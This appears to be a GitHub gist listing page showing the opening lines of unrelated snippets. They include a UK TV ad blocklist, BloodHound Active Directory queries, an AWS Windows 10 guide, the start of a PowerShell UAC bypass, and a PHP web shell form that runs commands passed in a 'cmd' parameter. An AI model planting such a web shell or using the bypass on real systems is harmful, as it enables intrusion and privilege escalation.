Skip to content

Instantly share code, notes, and snippets.

View shellfarmer's full-sized avatar
🏠
Working from home

shellfarmer shellfarmer

🏠
Working from home
View GitHub Profile
@rupert
rupert / domains
Created November 15, 2020 11:29
TV Ad Blocklist
# https://stopads.io/lists/UKcatchuptvblocklist.txt
tom.itv.com
2a7e9.v.fwmrm.net
p.videologygroup.com
2356e.v.fwmrm.net
# https://www.reddit.com/r/pihole/comments/hnpig6/does_anyone_have_a_custom_list_to_block_uk_tv/fxe4x0l/
cdn.ss.anno.channel4.com
webstats.channel4.com
tom.itv.com
@chryzsh
chryzsh / powershell-uac-always-notify-bypass.ps1
Created April 28, 2019 22:06
uac bypass for always notify (works on 1903)
$assemblies=(
"System"
)
$source=@"
using System;
using Microsoft.Win32;
using System.Diagnostics;
namespace Helloworld
@seajaysec
seajaysec / customqueries.json
Last active February 12, 2025 16:58
bloodhound custom queries
{
"queries": [{
"name": "List all owned users",
"queryList": [{
"final": true,
"query": "MATCH (m:User) WHERE m.owned=TRUE RETURN m"
}]
},
{
"name": "List all owned computers",
@edermi
edermi / kerberoast_pws.xz
Last active January 22, 2024 12:40
edermi Kerberoast PW list (XZ format)
This file has been truncated, but you can view the full file.
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
@peterforgacs
peterforgacs / Windows10AWSEC2.md
Last active April 4, 2025 20:52
Running Windows 10 on AWS EC2

Running Windows 10 on AWS EC2

Downloading the image

Download the windows image you want.

AWS vmimport supported versions: Microsoft Windows 10 (Professional, Enterprise, Education) (US English) (64-bit only)

So Home wont work.

@ivandiaz77
ivandiaz77 / README.md
Last active August 8, 2019 08:23
Tree folders Example with Django

Ejemplo para crear y mostrar estructura de carpetas con Django